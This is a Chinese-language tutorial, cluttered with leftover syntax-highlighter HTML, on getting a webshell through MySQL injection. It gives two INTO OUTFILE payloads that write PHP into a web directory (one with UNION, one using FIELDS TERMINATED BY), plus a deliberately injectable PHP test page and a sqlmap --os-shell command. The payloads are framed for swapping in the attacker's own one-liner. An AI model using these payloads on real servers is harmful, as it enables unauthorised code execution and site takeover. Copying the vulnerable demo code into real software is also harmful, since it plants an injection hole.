
MySQL注入两种写入一句话快速拿Webshell的方法
利用需要满足以下条件:
- root权限
- GPC关闭(能使用单引号)
- 有绝对路径(读文件可以不用,写文件必须)
- 没有配置–secure-file-priv
1.union
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| </div> <div class="crayon-main" style="margin:0px;padding:0px;list-style:none;"> <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;"> <tbody> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;"> <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;"> <div class="crayon-num" data-line="crayon-59a43f023b0b0450187454-1" style="margin:0px;padding:0px;list-style:none;"> 1 </div> </div> </td> <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;"> <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;"> <div id="crayon-59a43f023b0b0450187454-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;"> <span class="crayon-i">id</span><span class="crayon-o">=</span><span class="crayon-cn">2</span><span class="crayon-sy">)</span> <span class="crayon-e">union </span><span class="crayon-i">select</span> <span class="crayon-cn">1</span><span class="crayon-sy">,</span><span class="crayon-cn">2</span><span class="crayon-sy">,</span><span class="crayon-cn">3</span><span class="crayon-sy">,</span><span class="crayon-cn">4</span><span class="crayon-sy">,</span><span class="crayon-cn">5</span><span class="crayon-sy">,</span><span class="crayon-cn">6</span><span class="crayon-sy">,</span><span class="crayon-cn">7</span><span class="crayon-sy">,</span>'<span class="crayon-ta"><?</span> <span class="crayon-e">phpinfo</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span> <span class="crayon-ta">?></span>’ <span class="crayon-e">into </span><span class="crayon-i">outfile</span> ‘<span class="crayon-o">/</span><span class="crayon-i">home</span><span class="crayon-o">/</span><span class="crayon-i">wwwroot</span><span class="crayon-o">/</span><span class="crayon-i">lu4n</span><span class="crayon-sy">.</span><span class="crayon-i">com</span><span class="crayon-o">/</span><span class="crayon-i">luan_phpinfo</span><span class="crayon-sy">.</span><span class="crayon-i">php</span>’<span class="crayon-o">%</span><span class="crayon-cn">23</span> </div> </div> </td> </tr> </tbody> </table> </div>
|
<? phpinfo(); ?>
为写入的内容可添加自己的一句话 /home/wwwroot/5ime.cn/luan_phpinfo.php
为已存在的网站目录下的文件即插入文件名
2.no union
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| </div> <div class="crayon-main" style="margin:0px;padding:0px;list-style:none;"> <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;"> <tbody> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;"> <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;"> <div class="crayon-num" data-line="crayon-59a43f023b0b8247295740-1" style="margin:0px;padding:0px;list-style:none;"> 1 </div> </div> </td> <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;"> <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;"> <div id="crayon-59a43f023b0b8247295740-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;"> <span class="crayon-i">id</span><span class="crayon-o">=</span><span class="crayon-cn">2</span><span class="crayon-sy">)</span> <span class="crayon-e">into </span><span class="crayon-i">outfile</span> ‘<span class="crayon-o">/</span><span class="crayon-i">home</span><span class="crayon-o">/</span><span class="crayon-i">wwwroot</span><span class="crayon-o">/</span><span class="crayon-i">lu4n</span><span class="crayon-sy">.</span><span class="crayon-i">com</span><span class="crayon-o">/</span><span class="crayon-i">luan_phpinfo</span><span class="crayon-sy">.</span><span class="crayon-i">php</span>’ <span class="crayon-e">fields</span> <span class="crayon-e">terminated</span> <span class="crayon-e">by</span> ‘<span class="crayon-ta"><?</span> <span class="crayon-e">phpinfo</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span> <span class="crayon-ta">?></span>’<span class="crayon-o">%</span><span class="crayon-cn">23</span> </div> </div> </td> </tr> </tbody> </table> </div>
|
第二种方法最早最早是在吐司的一个 2015-1-24 的帖子里看到的,吐司果然大牛多。 效果如下:

这里用的第二种方法是通过插入分隔符号来getshell的,所以必须查询结果有多个列 一般情况下的注入点都是符合条件的。
sqlmap利用方法
以 luan_test.php
为例:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83
| </div> <div class="crayon-main" style="margin:0px;padding:0px;list-style:none;"> <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;"> <tbody> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;"> <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;"> <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-1" style="margin:0px;padding:0px;list-style:none;"> 1 </div> <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-2" style="margin:0px;padding:0px;list-style:none;"> 2 </div> <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-3" style="margin:0px;padding:0px;list-style:none;"> 3 </div> <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-4" style="margin:0px;padding:0px;list-style:none;"> 4 </div> <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-5" style="margin:0px;padding:0px;list-style:none;"> 5 </div> <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-6" style="margin:0px;padding:0px;list-style:none;"> 6 </div> <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-7" style="margin:0px;padding:0px;list-style:none;"> 7 </div> <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-8" style="margin:0px;padding:0px;list-style:none;"> 8 </div> <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-9" style="margin:0px;padding:0px;list-style:none;"> 9 </div> <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-10" style="margin:0px;padding:0px;list-style:none;"> 10 </div> <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-11" style="margin:0px;padding:0px;list-style:none;"> 11 </div> </div> </td> <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;"> <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;"> <div id="crayon-59a43f023b0bc142086430-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;"> <span class="crayon-ta"><?php</span> </div> <div id="crayon-59a43f023b0bc142086430-2" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;"> <span class="crayon-sy">@</span><span class="crayon-v">$link</span><span class="crayon-o">=</span> <span class="crayon-e">mysql_connect</span><span class="crayon-sy">(</span><span class="crayon-s">"localhost"</span><span class="crayon-sy">,</span><span class="crayon-s">"root"</span><span class="crayon-sy">,</span><span class="crayon-s">""</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span> </div> <div id="crayon-59a43f023b0bc142086430-3" class="crayon-line" style="margin:0px;padding:0px;list-style:none;"> <span class="crayon-e">mysql_select_db</span><span class="crayon-sy">(</span><span class="crayon-s">"mysql"</span><span class="crayon-sy">,</span><span class="crayon-v">$link</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span> </div> <div id="crayon-59a43f023b0bc142086430-4" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;"> <span class="crayon-v">$user</span> <span class="crayon-o">=</span> <span class="crayon-e">strtolower</span><span class="crayon-sy">(</span><span class="crayon-v">$_GET</span><span class="crayon-sy">[</span><span class="crayon-s">'user'</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span> </div> <div id="crayon-59a43f023b0bc142086430-5" class="crayon-line" style="margin:0px;padding:0px;list-style:none;"> <span class="crayon-st">if</span><span class="crayon-sy">(</span><span class="crayon-e">strpos</span><span class="crayon-sy">(</span><span class="crayon-v">$user</span><span class="crayon-sy">,</span><span class="crayon-s">"union"</span><span class="crayon-sy">)</span> <span class="crayon-o">===</span> <span class="crayon-t">false</span><span class="crayon-sy">)</span><span class="crayon-sy">{</span> </div> <div id="crayon-59a43f023b0bc142086430-6" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;"> <span class="crayon-v">$sql</span><span class="crayon-o">=</span> <span class="crayon-s">"SELECT * FROM user where user='{$user}'"</span><span class="crayon-sy">;</span> </div> <div id="crayon-59a43f023b0bc142086430-7" class="crayon-line" style="margin:0px;padding:0px;list-style:none;"> <span class="crayon-k ">echo</span> <span class="crayon-v">$sql</span> <span class="crayon-sy">.</span> <span class="crayon-s">'<br>'</span><span class="crayon-sy">;</span> </div> <div id="crayon-59a43f023b0bc142086430-8" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;"> <span class="crayon-e">mysql_query</span><span class="crayon-sy">(</span><span class="crayon-v">$sql</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span> </div> <div id="crayon-59a43f023b0bc142086430-9" class="crayon-line" style="margin:0px;padding:0px;list-style:none;"> <span class="crayon-k ">echo</span> <span class="crayon-e">mysql_errno</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span> <span class="crayon-sy">.</span> <span class="crayon-s">": "</span> <span class="crayon-sy">.</span> <span class="crayon-e">mysql_error</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span> <span class="crayon-s">" "</span><span class="crayon-sy">;</span> </div> <div id="crayon-59a43f023b0bc142086430-10" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;"> <span class="crayon-sy">}</span> </div> <div id="crayon-59a43f023b0bc142086430-11" class="crayon-line" style="margin:0px;padding:0px;list-style:none;"> <span class="crayon-ta">?></span> </div> </div> </td> </tr> </tbody> </table> </div>
|
经测试,sqlmap
最新版实际是支持这个方法的:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| </div> <div class="crayon-main" style="margin:0px;padding:0px;list-style:none;"> <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;"> <tbody> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;"> <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;"> <div class="crayon-num" data-line="crayon-59a43f023b0be210058938-1" style="margin:0px;padding:0px;list-style:none;"> 1 </div> </div> </td> <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;"> <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;"> <div id="crayon-59a43f023b0be210058938-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;"> <span class="crayon-v">C</span><span class="crayon-o">:</span><span class="crayon-sy">\</span><span class="crayon-v">luan</span><span class="crayon-sy">\</span><span class="crayon-v">sqlmap</span><span class="crayon-o">></span><span class="crayon-e">python </span><span class="crayon-v">sqlmap</span><span class="crayon-e">.py</span> <span class="crayon-o">-</span><span class="crayon-i">u</span> “<span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-o">/</span><span class="crayon-o">/</span><span class="crayon-cn">192.168.2.200</span><span class="crayon-o">/</span><span class="crayon-v">luan_test</span><span class="crayon-e">.php</span><span class="crayon-sy">?</span><span class="crayon-v">user</span><span class="crayon-o">=</span><span class="crayon-i">root</span>” –<span class="crayon-v">os</span><span class="crayon-o">-</span><span class="crayon-v">shell</span> </div> </div> </td> </tr> </tbody> </table> </div>
|


但是,如果–os-shell用不了,sqlmap有个写文件的选项,经测试不成功,也就是说,sqlmap只能传自己的webshell。


如果工具党遇到这种情况,直接使用sqlmap –os-shell然后用sqlmap上传的Webshell来操作就可以了。